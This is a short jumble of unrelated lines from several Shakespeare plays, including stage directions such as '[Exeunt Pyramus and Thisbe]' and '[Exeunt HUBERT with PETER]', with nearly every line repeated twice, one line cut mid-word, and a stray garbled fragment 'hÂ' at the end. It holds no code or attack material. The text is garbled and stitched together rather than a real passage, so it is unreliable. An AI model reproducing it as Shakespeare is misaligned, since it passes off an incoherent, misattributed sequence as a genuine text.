Bury it certain fathoms in the earth,
before the report come. If there be breadth enou
before the report come. If there be breadth enou
With willing sport to the wild ocean.
With willing sport to the wild ocean.
[Exeunt HUBERT with PETER]
[Exeunt HUBERT with PETER]
The abuse of greatness is, when it disjoins
The abuse of greatness is, when it disjoins
[Exeunt Pyramus and Thisbe]
[Exeunt Pyramus and Thisbe]
themselves, they may pass for excellent men. Here
themselves, they may pass for excellent men. Here
Then know that I, one Snug the joiner, am
Then know that I, one Snug the joiner, am
[Exeunt all but BENEDICK and BEATRICE]
[Exeunt all but BENEDICK and BEATRICE]
My master is of churlish disposition
My master is of churlish disposition
Go with me: if you like upon report
Go with me: if you like upon report
hÂ